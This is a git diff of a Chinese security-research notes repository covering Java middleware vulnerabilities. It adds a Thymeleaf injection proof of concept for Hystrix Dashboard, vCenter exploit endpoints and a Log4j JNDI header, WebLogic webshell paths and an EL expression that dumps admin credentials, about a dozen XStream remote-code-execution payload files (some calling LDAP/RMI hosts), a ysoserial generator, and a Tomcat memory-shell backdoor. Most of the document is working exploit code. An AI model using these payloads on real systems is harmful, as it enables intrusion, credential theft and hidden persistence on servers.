vulnerability](https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053) poc,在好自己最近在看spring-cloud这些微服务,然后就简单的看了看学习。 + +先简单的介绍一下**hystrix** + +## Hystrix + +容错监控机制 + +也就是微服务的容错机制是提前预设解决⽅案,系统进⾏⾃主调节,遇到问题及时处理 + +### Hystrix的优点 + +``` +服务隔离机制 +服务降级机制 +熔断机制 +提供实时的监控和报警功能 +提供实时的配置修改功能 +``` + +而hystrix-dashboard 就是可视化界⾯组件。 + +所以简单的说spring-cloud-starter-netflix-hystrix-dashboard 就是springcolud中的一个组件,是**Hystrix** 容错监控机制的可视化界⾯组件。 + + + +## 复现 + +三梦师傅也说明了漏洞版本 + +漏洞版本:spring-cloud-starter-netflix-hystrix-dashboard **2.2.0.RELEASE to 2.2.9.RELEASE** + +并且三梦师傅提供了漏洞环境,本地搭建起测试了一下,成功利用。 + +![image-20211123210133522](https://user-images.githubusercontent.com/63966847/146506766-df253d5b-d032-43cf-8019-d4af56376cca.png) + + +## 分析 + +还是经典的对比分析,对比漏洞版本和fix版本 + +![image-20211123210337765](https://user-images.githubusercontent.com/63966847/146506804-c8600043-5e0a-4d87-b3be-3230a1fd8587.png) + + +可以发现漏洞版本对{path}变量可以控制,熟悉**Thymeleaf**模板注入的师傅一眼就可以看出来了。 + +在该版本依赖的Thymeleaf组件版本是3.0.12。正好三梦师傅师傅之前写过文章bypass。前几天panda师傅也发了文章关于这部分进行介绍。 + +![image-20211123211222190](https://user-images.githubusercontent.com/63966847/146506787-871d831a-19bd-4571-a06b-19a65bdf080f.png) + + +poc + +```http +http://127.0.0.1:8080/hystrix/;/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22calc%22)%7D__::.x/ +``` + diff --git a/Struts2/README.md b/Struts2/README.md index bbe2332..5f8b882 100644 --- a/Struts2/README.md +++ b/Struts2/README.md @@ -19,3 +19,8 @@ [漏洞版本](http://archive.apache.org/dist/struts/binaries/) ![](./img/环境.png) + +## TODO +分析各个s2 漏洞 +s2-62 和新的 [https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) + diff --git a/Undertow/Readme.md b/Undertow/Readme.md new file mode 100644 index 0000000..16d8a83 --- /dev/null +++ b/Undertow/Readme.md @@ -0,0 +1,5 @@ +# Undertow + +https://blog.csdn.net/hollis_chuang/article/details/104470945 + +http://blog.hubwiz.com/2016/12/01/webserver-Undertow/ diff --git a/VMware vCenter/Readme.md b/VMware vCenter/Readme.md new file mode 100644 index 0000000..a4ff167 --- /dev/null +++ b/VMware vCenter/Readme.md @@ -0,0 +1,101 @@ +# vcenter + +### 版本查看 + +``` +/sdk/vimServiceVersions.xml +``` + +### VMware vCenter Server 任意文件读取漏洞 + +[VMware vCenter Server 任意文件读取漏洞](https://forum.90sec.com/t/topic/1582) + +endpoint +``` +/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties +``` + +### CVE-2021-21972 + +[VMware vCenter RCE 漏洞踩坑实录——一个简单的RCE漏洞到底能挖出什么知识](https://mp.weixin.qq.com/s/eamNsLY0uKHXtUw_fiUYxQ) + +[CVE-2021-21972 vCenter Server 文件写入漏洞分析](https://blog.noah.360.net/vcenter-6-5-7-0-rce-lou-dong-fen-xi/) + +``` +VMware vCenter Server 7.0系列 < 7.0.U1c +VMware vCenter Server 6.7系列 < 6.7.U3l +VMware vCenter Server 6.5系列 < 6.5 U3n +VMware ESXi 7.0系列 < ESXi70U1c-17325551 +VMware ESXi 6.7系列 < ESXi670-202102401-SG +VMware ESXi 6.5系列 < ESXi650-202102101-SG +``` + +endpoint + +``` +/ui/vropspluginui/rest/services/uploadova +``` + +### CVE-2021-21985 + +[CVE-2021-21985 VMware vCenter Server远程代码执行漏洞分析](https://www.ghtwf01.cn/2022/07/31/CVE-2021-21985%20VMware%20vCenter%20Server%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/) + +``` +VMware vCenter Server 7.0系列 < 7.0.U2b +VMware vCenter Server 6.7系列 < 6.7.U3n +VMware vCenter Server 6.5系列 < 6.5 U3p +VMware Cloud Foundation 4.x 系列 < 4.2.1 +VMware Cloud Foundation 4.x 系列 < 3.10.2.1 +``` + +### CVE-2021-22005 + +[vCenter RCE 详细分析过程 (CVE-2021–22005)](https://cloud.tencent.com/developer/article/1887641) + +``` +VMware vCenter Server 7.0 +VMware vCenter Server 6.7 Running On Virtual Appliance +VMware Cloud Foundation (vCenter Server) 4.x +VMware Cloud Foundation (vCenter Server) 3.x +``` + +### Log4j + +endpoint + +``` +/websso/SAML2/SSO/vsphere.local?SAMLRequest= + +X-Forwarded-For: ${jndi:ldap://exp} +``` + + + +### CVE-2022-31680 + +[CVE-2022-31680](https://talosintelligence.com/vulnerability_reports/TALOS-2022-1587) + +``` +GET /psc/data/constraint/amJzMXszAAAAATMAAAACAAAIRW1wbG95ZWUAASL6C7Hsp5eXAAKXEjO-44rgaCk1FZKH_mF7AQQAAAADAAAGTWFyY2luAAB6aQ HTTP/1.1 +Host: 192.168.0.109 +Cookie: JSESSIONID=D8E403940B6B595FF53158ED63671A69; XSRF-TOKEN=b28efbac-6d3c-4fcb-b177-baee9c1e005e; VSPHERE-USERNAME=Administrator%40VSPHERE.LOCAL; VSPHERE-CLIENT-SESSION-INDEX=_87577cc1f7ac5bba20fe8d947d9ffcfe +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 +Accept: application/json, text/plain, */* +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Pragma: no-cache +Isangularrequest: true +X-Xsrf-Token: b28efbac-6d3c-4fcb-b177-baee9c1e005e +Referer: https://192.168.0.109/psc/ +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin +Te: trailers +Connection: close +``` + +### 后续利用 + +[VMware vCenter漏洞实战利用总结](https://mp.weixin.qq.com/s/0gg5TDEtL3lCb9pOnm42gg) + +[Vcenter实战利用方式总结](https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247499057&idx=1&sn=24ce83c75152529f2b8ef8543162a734&chksm=cfa55922f8d2d0349b97211fdf45df6c78b26ace580b68579817ed67760aaface17348529cf3&mpshare=1&scene=23&srcid=10245pAGxEFHmXFGCMoKjGdB&sharer_sharetime=1666572610152&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) diff --git a/Weblogic/Readme.md b/Weblogic/Readme.md new file mode 100644 index 0000000..b594381 --- /dev/null +++ b/Weblogic/Readme.md @@ -0,0 +1,31 @@ +# Weblogic + +http://redteam.today/2020/03/25/weblogic%E5%8E%86%E5%8F%B2T3%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%8A%E8%A1%A5%E4%B8%81%E6%A2%B3%E7%90%86 + +https://www.yuque.com/tianxiadamutou/zcfd4v/aevpg0 + +http://redteam.today/2020/03/25/weblogic%E5%8E%86%E5%8F%B2T3%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%8A%E8%A1%A5%E4%B8%81%E6%A2%B3%E7%90%86/ + +https://y4er.com/post/weblogic-jrmp/ + +http://drops.xmd5.com/static/drops/web-13470.html + +https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247485058&idx=1&sn=d22b310acf703a32d938a7087c8e8704 + +http://blog.orange.tw/2018/03/pwn-ctf-platform-with-java-jrmp-gadget.html + +## 内存木马 +https://mp.weixin.qq.com/s/eI-50-_W89eN8tsKi-5j4g + +https://www.shuzhiduo.com/A/gVdnM4685W/ + +https://xz.aliyun.com/t/10323#toc-49 + +https://github.com/Y4er/WebLogic-Shiro-shell + +https://kuron3k0.github.io/2021/04/23/weblogic-memshell-1/ + +https://kuron3k0.github.io/2021/04/29/weblogic-memshell-2/ + +https://www.cnblogs.com/bitterz/p/14970230.html + diff --git a/Weblogic/Weblogic trick.md b/Weblogic/Weblogic trick.md new file mode 100644 index 0000000..6153bc9 --- /dev/null +++ b/Weblogic/Weblogic trick.md @@ -0,0 +1,29 @@ +## Weblogic trick + +## 写文件rce + +``` +\server\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\shell.jsp +访问:\bea_wls_internal\shell.jsp + + +\server\wlserver\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp +访问:\console\framework\skins\wlsconsole\images\shell.jsp + +\server\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\随机字符\war\shell.jsp +访问:\uddiexplorer\shell.jsp + +\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\项目名\随机字符\war\shell.jsp + +访问:\项目名\shell.jsp +``` + +### 获得用户密码 + +https://github.com/TideSec/Decrypt_Weblogic_Password + +el表达式 + +```java +${pageContext.setAttribute("classLoader",Thread.currentThread().getContextClassLoader());pageContext.setAttribute("httpDataTransferHandler",pageContext.getAttribute("classLoader").loadClass("weblogic.deploy.service.datatransferhandlers.HttpDataTransferHandler"));pageContext.setAttribute("managementService", pageContext.getAttribute("classLoader").loadClass("weblogic.management.provider.ManagementService"));pageContext.setAttribute("authenticatedSubject",pageContext.getAttribute("classLoader").loadClass("weblogic.security.acl.internal.AuthenticatedSubject"));pageContext.setAttribute("propertyService",pageContext.getAttribute("classLoader").loadClass("weblogic.management.provider.PropertyService"));pageContext.setAttribute("KERNE_ID",pageContext.getAttribute("httpDataTransferHandler").getDeclaredField("KERNE_ID"));pageContext.getAttribute("KERNE_ID").setAccessible(true);pageContext.setAttribute("getPropertyService",managementService.getMethod("getPropertyService",pageContext.getAttribute("authenticatedSubject")));pageContext.getAttribute("getPropertyService").setAccessible(true);pageContext.setAttribute("prop",pageContext.getAttribute("getPropertyService").invoke(null,pageContext.getAttribute("KERNE_ID").get((null))));pageContext.setAttribute("getTimestamp1",propertyService.getMethod("getTimestamp1"));pageContext.getAttribute("getTimestamp1").setAccessible(true);pageContext.setAttribute("getTimestamp2",propertyService.getMethod("getTimestamp2"));pageContext.getAttribute("getTimestamp2").setAccessible(true);pageContext.setAttribute("username", pageContext.getAttribute("getTimestamp1").invoke(pageContext.getAttribute("prop")));pageContext.setAttribute("password",pageContext.getAttribute("getTimestamp2").invoke(pageContext.getAttribute("prop")));pageContext.getAttribute("username").concat("/").concat(pageContext.getAttribute("password"))} +``` diff --git a/Weblogic/img/image-20210815001234456.png b/Weblogic/img/image-20210815001234456.png new file mode 100644 index 0000000..418450f Binary files /dev/null and b/Weblogic/img/image-20210815001234456.png differ diff --git a/Weblogic/img/image-20210815103726507.png b/Weblogic/img/image-20210815103726507.png new file mode 100644 index 0000000..d433ccc Binary files /dev/null and b/Weblogic/img/image-20210815103726507.png differ diff --git a/Weblogic/img/image-20210815103750342.png b/Weblogic/img/image-20210815103750342.png new file mode 100644 index 0000000..da8aa57 Binary files /dev/null and b/Weblogic/img/image-20210815103750342.png differ diff --git a/Weblogic/img/image-20210815110026954.png b/Weblogic/img/image-20210815110026954.png new file mode 100644 index 0000000..b2c83b0 Binary files /dev/null and b/Weblogic/img/image-20210815110026954.png differ diff --git a/Weblogic/img/image-20210815110029190.png b/Weblogic/img/image-20210815110029190.png new file mode 100644 index 0000000..b2c83b0 Binary files /dev/null and b/Weblogic/img/image-20210815110029190.png differ diff --git a/Weblogic/img/image-20210815153940829.png b/Weblogic/img/image-20210815153940829.png new file mode 100644 index 0000000..6e1fe42 Binary files /dev/null and b/Weblogic/img/image-20210815153940829.png differ diff --git a/Xstream/Readme.md b/Xstream/Readme.md new file mode 100644 index 0000000..73dc6d9 --- /dev/null +++ b/Xstream/Readme.md @@ -0,0 +1,144 @@ +# Xstream + +>该项目是为了整理Xstream的exp,有一些没有测试成功,欢迎pr。 +> +>本来想写一个工具了生成exp,然后感觉这样整理出来也比较方便。。。。。懒。。 + +| XStream 远程代码执行漏洞 | CVE-2013-7285 | 1.4.x + + + java.lang.Comparable + + + + calc.exe + + + start + + + +``` + + + +```xml +1. 16进制绕过 + + + +当前黑名单为org[.]springframework,此时的绕过方法可以为 + + + +2. 针对标签属性内容的绕过 + + + +此时的黑名单为custom,那么绕过方法可以为 + + + +原理为读取属性内容时,会做符合要求的转化 + +3. 针对标签内容的绕过 + +ldap://xxxxx + +此时的黑名单为ldap://,可以用如下的几种方法绕过 + +html编码: +这部分在提取数据时,同样对html编码的内容做了转化 + +ldap://xxxxx + + +注释的方法: +在处理实际的标签内容时,遇到注视内容将被忽略掉 + +ldap://xxxxx + +``` + + +## 工具生成poc + + +``` +java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.XStream +``` + + + +配合yso生成xstream的exp。添加Xstream组件依赖 + +```java +package ysoserial.exploit; + +import clojure.lang.IFn; +import com.thoughtworks.xstream.XStream; +import ysoserial.payloads.ObjectPayload; + +@SuppressWarnings({ + "rawtypes" +}) + +public class Xstream { + public static void main(String[] args) { + if(args.length<2){ + System.out.println("exit"); + } + final Object payloadObject = ObjectPayload.Utils.makePayloadObject(args[0],args[1]); + com.thoughtworks.xstream.XStream xstream = new XStream(); + //System.out.println(payloadObject); + String s = xstream.toXML(payloadObject); + System.out.println(s); + ObjectPayload.Utils.releasePayload(args[0],payloadObject); + } +} +``` + + + diff --git a/Xstream/exp/CSRF/CVE-2021-21349.xml b/Xstream/exp/CSRF/CVE-2021-21349.xml new file mode 100644 index 0000000..fbaee11 --- /dev/null +++ b/Xstream/exp/CSRF/CVE-2021-21349.xml @@ -0,0 +1 @@ +no find... \ No newline at end of file diff --git a/Xstream/exp/DOS/CVE-2017-7957.xml b/Xstream/exp/DOS/CVE-2017-7957.xml new file mode 100644 index 0000000..fbaee11 --- /dev/null +++ b/Xstream/exp/DOS/CVE-2017-7957.xml @@ -0,0 +1 @@ +no find... \ No newline at end of file diff --git a/Xstream/exp/DOS/CVE-2021-21348.xml b/Xstream/exp/DOS/CVE-2021-21348.xml new file mode 100644 index 0000000..fbaee11 --- /dev/null +++ b/Xstream/exp/DOS/CVE-2021-21348.xml @@ -0,0 +1 @@ +no find... \ No newline at end of file diff --git a/Xstream/exp/RCE/CVE-2013-7285-2.xml b/Xstream/exp/RCE/CVE-2013-7285-2.xml new file mode 100644 index 0000000..1a29a2c --- /dev/null +++ b/Xstream/exp/RCE/CVE-2013-7285-2.xml @@ -0,0 +1,20 @@ + + + fookey + foovalue + + + + java.lang.Comparable + + + + calc.exe + + + start + + + good + + \ No newline at end of file diff --git a/Xstream/exp/RCE/CVE-2013-7285.xml b/Xstream/exp/RCE/CVE-2013-7285.xml new file mode 100644 index 0000000..9363080 --- /dev/null +++ b/Xstream/exp/RCE/CVE-2013-7285.xml @@ -0,0 +1,16 @@ + + foo + + java.lang.Comparable + + + + cmd + /C + calc + + + start + + + \ No newline at end of file diff --git a/Xstream/exp/RCE/CVE-2019-10173.xml b/Xstream/exp/RCE/CVE-2019-10173.xml new file mode 100644 index 0000000..9363080 --- /dev/null +++ b/Xstream/exp/RCE/CVE-2019-10173.xml @@ -0,0 +1,16 @@ + + foo + + java.lang.Comparable + + + + cmd + /C + calc + + + start + + + \ No newline at end of file diff --git a/Xstream/exp/RCE/CVE-2020-26217.xml b/Xstream/exp/RCE/CVE-2020-26217.xml new file mode 100644 index 0000000..7bab753 --- /dev/null +++ b/Xstream/exp/RCE/CVE-2020-26217.xml @@ -0,0 +1,54 @@ + + + + 0 + + + + text/plain + + + + + 0 + -1 + 1 + + + + cmd + /C + {cmd} + + + + + + + java.lang.ProcessBuilder + start + + + start + + + + KEYS + + + + 0 + 0 + 0 + + + false + + + + 0 + + + test + + \ No newline at end of file diff --git a/Xstream/exp/RCE/CVE-2021-21344.xml b/Xstream/exp/RCE/CVE-2021-21344.xml new file mode 100644 index 0000000..35886a2 --- /dev/null +++ b/Xstream/exp/RCE/CVE-2021-21344.xml @@ -0,0 +1,103 @@ + + + + + 2 + + + + + + + + + com.sun.rowset.JdbcRowSetImpl + + + + + com.sun.rowset.JdbcRowSetImpl + getDatabaseMetaData + + + + + + + + + + + + true + + + 1 + + + UTF-8 + + + + + + + + + 1008 + true + 1000 + 0 + 2 + 0 + 0 + 0 + true + 1004 + false + {rmi} + + + + + + + -1 + -1 + -1 + -1 + -1 + -1 + -1 + -1 + -1 + -1 + + + foo + + + + + + + + + + + + + + + + + + + + + + 3 + javax.xml.ws.binding.attachments.inbound + javax.xml.ws.binding.attachments.inbound + + \ No newline at end of file diff --git a/Xstream/exp/RCE/CVE-2021-21345.xml b/Xstream/exp/RCE/CVE-2021-21345.xml new file mode 100644 index 0000000..d5b57da --- /dev/null +++ b/Xstream/exp/RCE/CVE-2021-21345.xml @@ -0,0 +1,59 @@ + + + + + 2 + + + + + + + + + com.sun.corba.se.impl.activation.ServerTableEntry + + + + + com.sun.corba.se.impl.activation.ServerTableEntry + verify + + + + + + + + + + + + true + + + 1 + + + UTF-8 + + + + + + + {cmd} + + + + + + + + + + 3 + javax.xml.ws.binding.attachments.inbound + javax.xml.ws.binding.attachments.inbound + + \ No newline at end of file diff --git a/Xstream/exp/RCE/CVE-2021-21346.xml b/Xstream/exp/RCE/CVE-2021-21346.xml new file mode 100644 index 0000000..fbaee11 --- /dev/null +++ b/Xstream/exp/RCE/CVE-2021-21346.xml @@ -0,0 +1 @@ +no find... \ No newline at end of file diff --git a/Xstream/exp/RCE/CVE-2021-21347.xml b/Xstream/exp/RCE/CVE-2021-21347.xml new file mode 100644 index 0000000..148ca8c --- /dev/null +++ b/Xstream/exp/RCE/CVE-2021-21347.xml @@ -0,0 +1 @@ +no find.. \ No newline at end of file diff --git a/Xstream/exp/RCE/CVE-2021-21350.xml b/Xstream/exp/RCE/CVE-2021-21350.xml new file mode 100644 index 0000000..148ca8c --- /dev/null +++ b/Xstream/exp/RCE/CVE-2021-21350.xml @@ -0,0 +1 @@ +no find.. \ No newline at end of file diff --git a/Xstream/exp/RCE/CVE-2021-21351.xml b/Xstream/exp/RCE/CVE-2021-21351.xml new file mode 100644 index 0000000..c5895a2 --- /dev/null +++ b/Xstream/exp/RCE/CVE-2021-21351.xml @@ -0,0 +1,74 @@ + + + ysomap + + + + -10086 + + <__overrideDefaultParser>false + false + false + + + + + + false + false + + + + + 1008 + true + 1000 + 0 + 2 + 0 + 0 + 0 + true + 1004 + false + {rmi} + + + + + + + + + + com.sun.rowset.JdbcRowSetImpl + setAutoCommit + + boolean + + + + false + + + false + + false + + -1 + false + false + + 1 + + 1 + false + + + + ysomap + + test + + + \ No newline at end of file diff --git a/Xstream/exp/RCE/CVE-2021-29505.xml b/Xstream/exp/RCE/CVE-2021-29505.xml new file mode 100644 index 0000000..2ba3040 --- /dev/null +++ b/Xstream/exp/RCE/CVE-2021-29505.xml @@ -0,0 +1,55 @@ + + + + + 2 + + 3 + + 12345 + + com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content + + + + 12345 + + + true + SOAP_11 + + + false + + + + + aa + aa + + + + + + UnicastRef + 1.116.136.120 + 2333 + 0 + 0 + 0 + 0 + false + + + 1.116.136.120 + 2333 + + + + + + + + + + \ No newline at end of file diff --git a/Xstream/exp/RCE/CVE-2021-39141.xml b/Xstream/exp/RCE/CVE-2021-39141.xml new file mode 100644 index 0000000..65432a3 --- /dev/null +++ b/Xstream/exp/RCE/CVE-2021-39141.xml @@ -0,0 +1,172 @@ + + + + + 2 + + 3 + + java.lang.Comparable + + + false + + + + + java.lang.Comparable + compareTo + + java.lang.Object + + + + + + 0 + + + PLAIN + + + + false + + int + + hash + java.lang.String + + + false + + + hash + + + + java.lang.String + + javax.naming.InitialContext + doLookup + + java.lang.String + + + + + + + serialPersistentFields + + [Ljava.io.ObjectStreamField; + + serialPersistentFields + java.lang.String + + + + + CASE_INSENSITIVE_ORDER + + java.util.Comparator + + CASE_INSENSITIVE_ORDER + java.lang.String + + + + + serialVersionUID + + long + + serialVersionUID + java.lang.String + + + + + value + + [C + + value + java.lang.String + + + + + hash + + int + + + + + + + serialPersistentFields + + [Ljava.io.ObjectStreamField; + + + + + CASE_INSENSITIVE_ORDER + + java.util.Comparator + + + + + serialVersionUID + + long + + + + + value + + [C + + + + + hash + + + + false + java.lang.String + + + + + java.lang.Object + + false + + false + + + + false + + + + + + + + false + false + + + + + + ldap://127.0.0.1:15000/#evil + + \ No newline at end of file diff --git a/Xstream/exp/RCE/CVE-2021-39144.xml b/Xstream/exp/RCE/CVE-2021-39144.xml new file mode 100644 index 0000000..b71988b --- /dev/null +++ b/Xstream/exp/RCE/CVE-2021-39144.xml @@ -0,0 +1,38 @@ + + + + + 2 + + 3 + + java.lang.Comparable + + true + java.lang.Comparable + + + + java.lang.Comparable + compareTo + + java.lang.Object + + + + + + java.lang.Runtime + exec + + java.lang.String + + + + + + + + calc + + \ No newline at end of file diff --git a/Xstream/exp/RCE/CVE-2021-39146.xml b/Xstream/exp/RCE/CVE-2021-39146.xml new file mode 100644 index 0000000..dbc66e1 --- /dev/null +++ b/Xstream/exp/RCE/CVE-2021-39146.xml @@ -0,0 +1,59 @@ + + + test + + + + + 0.75 + 525 + + 700 + 0 + + + + zh_CN + + + + + + + + + + + 0.75 + 525 + + 700 + 1 + lazyValue + + javax.naming.InitialContext + doLookup + + ldap://127.0.0.1:15000/#evil + + + + + + + + + + + + + + + + + test + + test + + + \ No newline at end of file diff --git a/Xstream/exp/XXE/CVE-2016-3674.xml b/Xstream/exp/XXE/CVE-2016-3674.xml new file mode 100644 index 0000000..148ca8c --- /dev/null +++ b/Xstream/exp/XXE/CVE-2016-3674.xml @@ -0,0 +1 @@ +no find.. \ No newline at end of file diff --git a/apache storm/Readme.md b/apache storm/Readme.md new file mode 100644 index 0000000..c269064 --- /dev/null +++ b/apache storm/Readme.md @@ -0,0 +1,21 @@ +# apache storm + +## 环境搭建 + +https://blog.51cto.com/u_13870740/3445168 + +https://github.com/heibaiying/BigData-Notes/blob/master/notes/installation/Storm%E5%8D%95%E6%9C%BA%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA.md + +``` +nohup bash storm dev-zookeeper & bash storm nimbus & bash storm supervisor &bash storm ui & bash storm logviewer & +``` + +## 漏洞分析 + +https://paper.seebug.org/1780/#0x03 + +https://blog.noah.360.net/apache-storm-vulnerability-analysis/ + +https://y4er.com/posts/apache-storm-two-cve/ + +**自己尝试反序列化并没有成功cb,环境是2.1.0** diff --git a/hadoop/Readme.md b/hadoop/Readme.md new file mode 100644 index 0000000..7e168b6 --- /dev/null +++ b/hadoop/Readme.md @@ -0,0 +1,21 @@ +# Hadoop + +[【安全风险通告】Apache Hadoop Yarn RPC未授权访问漏洞安全风险通告](https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247495027&idx=1&sn=5758a6717309a55e09f184e5bae82c75&chksm=fe79c9ebc90e40fd6d0c3f0bd21ce92f53b4f58aa0ee07d0c005ca85a28d2cfd70f61c40fae7&mpshare=1&scene=23&srcid=1123jW67UF5RY5e5aOeDZ5ha&sharer_sharetime=1637638003307&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + +[Hadoop Yarn RPC RCE 复现](https://mp.weixin.qq.com/s/lVl5HnVuZyLTIeSrbw1cuA) + +[Hadoop Yarn RPC未授权RCE(含一键利用工具)](https://mp.weixin.qq.com/s?__biz=MzkwNDI1NDUwMQ==&mid=2247485150&idx=1&sn=c31937fdb3e92ae3951a98b7967032b2&chksm=c0888394f7ff0a8224a8984f2cb4935f9aa1e7d243c4b512c488600d8fef0b6ec16a2b345865&token=616099468&lang=zh_CN#rd) + +[Hadoop Yarn RPC未授权访问漏洞复现](https://zgao.top/hadoop-yarn-rpc%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/) + +[GHSL-2022-012: Arbitrary file write during TAR extraction in Apache Hadoop - CVE-2022-26612](https://securitylab.github.com/advisories/GHSL-2022-012_Apache_Hadoop/) + +## 环境搭建 + +org.apache.hadoop.yarn.util.resource.ResourceUtils + +``` +docker pull kpli0rn/hadoop-rpc-vuln:3.3.0 +docker run -d --name yarn -p 8042:8042 -p 8032:8032 kpli0rn/hadoop-rpc-vuln:3.3.0 +``` + diff --git a/image.png b/image.png new file mode 100644 index 0000000..2fb9c15 Binary files /dev/null and b/image.png differ diff --git a/jackson/Readme.md b/jackson/Readme.md new file mode 100644 index 0000000..2f9d12f --- /dev/null +++ b/jackson/Readme.md @@ -0,0 +1,36 @@ +# jackson + +http://www.lmxspace.com/2019/07/30/Jackson-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%B1%87%E6%80%BB/ + +https://www.i4k.xyz/article/caiqiiqi/105193411 + +https://github.com/cowtowncoder/jackson-compat-minor/ + +## 不出网利用 +1.TemplatesImpl + +http://www.lmxspace.com/2019/07/30/Jackson-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%B1%87%E6%80%BB/#TemplatesImpl + +2.c3p0 + +http://redteam.today/2020/04/18/c3p0%E7%9A%84%E4%B8%89%E4%B8%AAgadget/ + +## 验证存在jackson漏洞 + +```java +ObjectMapper objectMapper = new ObjectMapper(); +objectMapper.enableDefaultTyping(); +/** +objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL); +objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.JAVA_LANG_OBJECT); +objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE); +objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_CONCRETE_AND_ARRAYS); +*/ +String jsonResult = "[\"java.util.HashSet\",[[\"java.net.URL\",\"http://1wc3gw.dnslog.cn\"]]]"; +objectMapper.readValue(jsonResult,Object.class); +``` +其他exp +```java +["java.net.InetSocketAddress","nqigwr.dnslog.cn"] +["java.net.InetAddress","ap6d50.dnslog.cn"] +``` diff --git "a/java\345\206\205\345\255\230\351\251\254/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Readme.md" index 18e7930..4859d8a 100644 --- "a/java\345\206\205\345\255\230\351\251\254/Readme.md" +++ "b/java\345\206\205\345\255\230\351\251\254/Readme.md" @@ -1 +1,27 @@ # java内存马 + ++ [Java Web中的Servlet+Filter+Listener注册方式](https://www.jianshu.com/p/cbe1c3174d41) ++ [awd shiro内存木马注入](https://github.com/KpLi0rn/ShiroVulnEnv) ++ [基于tomcat的内存 Webshell 无文件攻击技术](https://xz.aliyun.com/t/7388) ++ [JavaWeb 内存马一周目通关攻略](https://su18.org/post/memory-shell/) ++ [JavaWeb 内存马二周目通关攻略](https://su18.org/post/memory-shell-2/) ++ [【原创】利用“进程注入”实现无文件不死webshell](https://www.cnblogs.com/rebeyond/p/9686213.html) + +## springboot ++ [利用 intercetor 注入 spring 内存 webshell](https://landgrey.me/blog/19/) + +## spring ++ [基于内存 Webshell 的无文件攻击技术研究](https://landgrey.me/blog/12/) ++ [前尘——内存中无处可寻的木马](https://www.anquanke.com/post/id/253475) + +## 后门 ++ [一种tomcat中间件留持久化后门的思路](https://gv7.me/articles/2021/an-idea-of-keeping-persistent-backdoor-in-tomcat-middleware/) ++ [JavaWeb 内存马二周目通关攻略](https://tttang.com/archive/1313) + +## jsp ++ [](https://xz.aliyun.com/t/10372) + +## 查杀 ++ [查杀Java web filter型内存马](https://gv7.me/articles/2020/kill-java-web-filter-memshell/) ++ [Filter/Servlet型内存马的扫描抓捕与查杀](https://gv7.me/articles/2020/filter-servlet-type-memshell-scan-capture-and-kill/) ++ [基于javaAgent内存马检测查杀指南](https://mp.weixin.qq.com/s/Whta6akjaZamc3nOY1Tvxg#at) diff --git "a/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" new file mode 100644 index 0000000..596af80 --- /dev/null +++ "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" @@ -0,0 +1,99 @@ +# Upgrade + +参考:https://tttang.com/archive/1709 + +```java +package com.example.demo; + + +import org.apache.catalina.connector.Connector; +import org.apache.catalina.connector.Request; +import org.apache.catalina.connector.RequestFacade; +import org.apache.coyote.Adapter; +import org.apache.coyote.Processor; +import org.apache.coyote.Response; +import org.apache.coyote.UpgradeProtocol; +import org.apache.coyote.http11.AbstractHttp11Protocol; +import org.apache.coyote.http11.upgrade.InternalHttpUpgradeHandler; +import org.apache.tomcat.util.net.SocketWrapperBase; +import org.springframework.web.context.request.RequestContextHolder; +import org.springframework.web.context.request.ServletRequestAttributes; + +import javax.servlet.http.HttpServletRequest; +import java.lang.reflect.Field; +import java.nio.ByteBuffer; +import java.util.HashMap; + +public class UpgradeMemShell implements UpgradeProtocol { + + public UpgradeMemShell() throws Exception{ + HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest(); + RequestFacade rf = (RequestFacade) request; + Field requestField = RequestFacade.class.getDeclaredField("request"); + requestField.setAccessible(true); + Request request1 = (Request) requestField.get(rf); + + Field connector = Request.class.getDeclaredField("connector"); + connector.setAccessible(true); + Connector realConnector = (Connector) connector.get(request1); + + Field protocolHandlerField = Connector.class.getDeclaredField("protocolHandler"); + protocolHandlerField.setAccessible(true); + AbstractHttp11Protocol handler = (AbstractHttp11Protocol) protocolHandlerField.get(realConnector); + + HashMap 